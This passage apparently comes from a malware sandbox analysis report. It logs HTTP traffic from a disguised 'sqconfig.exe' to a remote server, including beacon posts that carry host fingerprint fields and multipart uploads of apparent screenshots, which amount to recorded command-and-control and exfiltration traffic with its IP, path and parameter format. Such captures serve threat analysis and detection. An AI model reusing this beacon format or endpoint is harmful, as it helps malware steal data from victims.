                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:44.831707954 CEST18022OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:44.960128069 CEST18030OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:44.960199118 CEST18038OUTData Raw: 60 29 db 6a 43 13 0e d4 98 a5 ca c7 cc 33 14 e0 29 71 4b 8a 76 15 c6 e2 94 0a 5c 53 b1 4e c2 b8 dc 51 8a 76 29 71 40 5c 6e 29 71 4e c5 28 15 56 26 e3 71 46 29 f8 a3 14 ec 2b 91 e2 93 6d 4d b6 93 6d 1c a3 e6 21 2b 48 56 a7 2b 4d 2b 53 ca 3e 62 be
                                                                  Data Ascii: `)jC3)qKv\SNQv)q@\n)qN(V&qF)+mMm!+HV+M+S>biJVR2iJWR2J\)L)PhS+M+VS+7E29ZaZHi9_ZaZR"I2S"Ch%%%;bS66:u[xZk[kIFq1L3)<O`V{r
                                                                  Sep 30, 2021 23:53:44.960635900 CEST18042OUTData Raw: 17 c7 1a a2 6b d7 6a 8a 00 55 52 00 00 76 1c 52 ff 00 c2 c6 f1 8f fd 0c 17 bf f7 d0 ff 00 0a e4 85 1a b0 77 8c ac fd 59 d5 3a b4 a6 ad 25 74 7d 29 a6 f8 5b 44 d2 26 f3 ac b4 e8 a3 94 74 76 25 d8 7d 0b 12 47 e1 56 b5 af f9 00 ea 3f f5 eb 2f fe 80
                                                                  Data Ascii: kjURvRwY:%t})[D&tv%}GV?/kX1Sdchefz1DwUh#4Q]((|$u^]+0%g8kxGZkBIoeiR &3_jZey8nTl\O\
                                                                  Sep 30, 2021 23:53:44.960689068 CEST18048OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:53:45.089782000 CEST18056OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:45.089838982 CEST18059OUTData Raw: ad 1e ca 7d 85 ed a1 dc a1 4e e2 af 0d 38 fa d2 8d 38 fa d5 7b 19 76 13 ad 0e e5 0a 2a ff 00 f6 71 f5 a5 fe ce 3e a2 8f 65 2e c1 ed a3 dc a1 4e ab c3 4e 3e b4 e1 a7 1f 5a af 63 2e c4 fb 68 77 33 e9 2b 48 69 a7 d6 97 fb 30 fa d1 ec 66 2f 6f 0e e6
                                                                  Data Ascii: }N88{v*q>e.NN>Zc.hw3+Hi0f/on)kQ4GZOUK>>E<VH_U{)3E_WSdZMav'44e/:zT/b)*V_YG^Ujjs8x@
                                                                  Sep 30, 2021 23:53:45.089873075 CEST18070OUTData Raw: 2a 9b 69 04 09 3c 20 05 67 42 37 64 ee 63 b4 e4 b1 f5 aa da 46 a5 a4 69 5e 19 d2 f5 66 3a 94 29 67 ae cf 3d a5 b4 7b 25 69 48 86 12 12 49 72 9b 54 f0 09 08 78 27 8a 9f 6c ed 7f eb 57 61 fb 25 7f eb a2 b9 ca ae 8b aa b6 96 75 55 d2 ef 8e 9c 01 26
                                                                  Data Ascii: *i< gB7dcFi^f:)g={%iHIrTx'lWa%uU&[^I'gnSf%aH[V3_n].D%e%p7)Qb:~v'hbe96F<|goN)y+_ok_Gcy4C.Qbb/<#5.
                                                                  Sep 30, 2021 23:53:45.260910034 CEST18097INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:45 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  157192.168.2.34999291.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:45.233644962 CEST18097OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:45.402853966 CEST18097INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:45 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0
                                                                  Sep 30, 2021 23:53:45.487492085 CEST18098OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:45.487683058 CEST18098OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:45.487894058 CEST18108OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:45.488032103 CEST18111OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:45.616796970 CEST18116OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:45.616871119 CEST18137OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:53:45.745965958 CEST18149OUTData Raw: 00 15 1c 78 1a d3 de 4a f2 e7 3f 37 e3 5c 78 2f e1 4b d5 9f 47 5f 59 c7 d1 1e cb 37 1e 0f d2 3f dc 1f ca b1 cf 5a d8 b8 ff 00 91 4b 47 ff 00 ae 63 f9 56 3f 7a e4 c3 7c 2f d5 9a 63 3e 35 e8 80 7b d2 e0 51 4b 5d 27 1a 10 0a 7e 29 b4 a2 91 48 70 14
                                                                  Data Ascii: xJ?7\x/KG_Y7?ZKGcV?z|/c>5{QK]'~)Hpp)JK-N)sRhQMIxT2tT!Slhi1J%"Pi:phk~)?"=k~((|dUm#Cm<Bfo1}Xc9iZh7
                                                                  Sep 30, 2021 23:53:45.746047974 CEST18159OUTData Raw: 4d 14 e1 40 98 ea 29 33 4a 29 92 3a 8a 43 45 02 62 d1 45 28 a0 46 c7 87 bf e3 fd bf eb 99 aa 6d f7 db eb 56 f4 0f f8 fe 6f fa e6 6a a3 7d f6 fa 9a c2 3f c5 63 a9 fc 34 25 2d 1d a8 15 b9 ce 2d 3a 9b 4e a4 48 53 a9 05 2d 4b 10 a2 8a 4a 5a 09 0a 28
                                                                  Data Ascii: M@)3J):CEbE(FmVoj}?c4%--:NHS-KJZ(F(bG47(BV>F8I{NgnTK%?,=yKoWDY[[_;>kq{st^*t$gBfKSi4\p4
                                                                  Sep 30, 2021 23:53:45.746640921 CEST18184OUTData Raw: f1 fa e0 c4 e6 34 b0 f2 e5 9a 7f 2b 7f 99 bd 2c 2c ea ab a6 8f 9c 29 45 7d 20 bf 0b bc 18 7a e8 df f9 35 37 ff 00 17 5c ff 00 8f fe 1f f8 5f 44 f0 3e a3 a8 e9 da 67 91 77 0f 97 b2 4f b4 4a d8 cc 8a a7 86 62 3a 13 59 52 ce 28 54 9a 82 4e ed db a7
                                                                  Data Ascii: 4+,,)E} z57\_D>gwOJb:YR(TN<HQ)Ez RRQEb4G{+ff-NV?+#yFkCLM2YarAi]t(~nZ_VQ\k&TZWGRR-bJi))J:!
                                                                  Sep 30, 2021 23:53:45.932090044 CEST18185INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:45 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  158192.168.2.34999391.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:45.648113966 CEST18138OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:45.831099987 CEST18184INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:45 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  159192.168.2.34999491.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:46.079555988 CEST18186OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:46.260215044 CEST18186INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:46 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0
                                                                  Sep 30, 2021 23:53:46.394186974 CEST18186OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:46.394274950 CEST18187OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:46.394448042 CEST18197OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:46.394535065 CEST18199OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:46.516305923 CEST18208OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:46.516391993 CEST18226OUTData Raw: 60 29 db 6a 43 13 0e d4 98 a5 ca c7 cc 33 14 e0 29 71 4b 8a 76 15 c6 e2 94 0a 5c 53 b1 4e c2 b8 dc 51 8a 76 29 71 40 5c 6e 29 71 4e c5 28 15 56 26 e3 71 46 29 f8 a3 14 ec 2b 91 e2 93 6d 4d b6 93 6d 1c a3 e6 21 2b 48 56 a7 2b 4d 2b 53 ca 3e 62 be
                                                                  Data Ascii: `)jC3)qKv\SNQv)q@\n)qN(V&qF)+mMm!+HV+M+S>biJVR2iJWR2J\)L)PhS+M+VS+7E29ZaZHi9_ZaZR"I2S"Ch%%%;bS66:u[xZk[kIFq1L3)<O`V{r
                                                                  Sep 30, 2021 23:53:46.640366077 CEST18235OUTData Raw: 00 15 1c 78 1a d3 de 4a f2 e7 3f 37 e3 5c 78 2f e1 4b d5 9f 47 5f 59 c7 d1 1e cb 37 1e 0f d2 3f dc 1f ca b1 cf 5a d8 b8 ff 00 91 4b 47 ff 00 ae 63 f9 56 3f 7a e4 c3 7c 2f d5 9a 63 3e 35 e8 80 7b d2 e0 51 4b 5d 27 1a 10 0a 7e 29 b4 a2 91 48 70 14
                                                                  Data Ascii: xJ?7\x/KG_Y7?ZKGcV?z|/c>5{QK]'~)Hpp)JK-N)sRhQMIxT2tT!Slhi1J%"Pi:phk~)?"=k~((|dUm#Cm<Bfo1}Xc9iZh7
                                                                  Sep 30, 2021 23:53:46.640469074 CEST18266OUTData Raw: dc 1f 4a ee bc 69 f1 06 d3 c6 3e 05 b4 b6 78 cd be a9 0d ea 3c b0 80 4a b2 84 70 59 4f a6 48 e0 f2 33 df ad 78 79 86 02 a5 6a ea 4b 67 a7 a1 df 86 c4 46 9d 36 9e e8 f6 d8 bb 55 b8 eb e3 f1 4b 59 2c 83 fe 9e 7e 1f f0 4b 79 8f f7 7f 1f f8 01 4b 8a
                                                                  Data Ascii: Ji>x<JpYOH3xyjKgF6UKY,~KyKJQ_FyaKICGBA5W4OGl?enq9%(xjIoyr^n=1"A"|bO,6>qbXTrODKe[JmKs^k=
                                                                  Sep 30, 2021 23:53:46.640647888 CEST18272OUTData Raw: 96 33 cd 04 d5 7a 28 f6 be 43 f6 64 f4 66 a0 a2 8f 6b e4 1e cc b1 9a 2a bd 2d 1e db c8 5e cf cc 9a 97 b5 57 a2 97 b5 f2 1f b3 f3 26 a2 a1 a2 8f 6b e4 1e cc 9e 8a 82 96 8f 6b e4 1e cf cc 97 bd 2d 43 49 4f da f9 07 b3 f3 27 a2 a0 a5 a3 da f9 07 b3
                                                                  Data Ascii: 3z(Cdfk*-^W&kk-CIO'&'h<RQ<PR<RZRiROM4@'<gu88jmM5~<O c#{2v6Nci&-qUW`X[jv\ZY#e
                                                                  Sep 30, 2021 23:53:46.640892029 CEST18272OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 2d 2d 0d 0a
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912--
                                                                  Sep 30, 2021 23:53:46.827539921 CEST18273INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:46 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  16192.168.2.34977591.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:52:54.015428066 CEST7543OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:52:54.214555979 CEST7591INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:52:54 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  160192.168.2.34999591.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:46.620297909 CEST18226OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:46.825115919 CEST18273INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:46 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  161192.168.2.34999691.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:47.074717999 CEST18274OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:47.268935919 CEST18288INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:47 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  162192.168.2.34999791.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:47.180330038 CEST18275OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:47.180777073 CEST18275OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:47.181232929 CEST18285OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:47.181560993 CEST18288OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
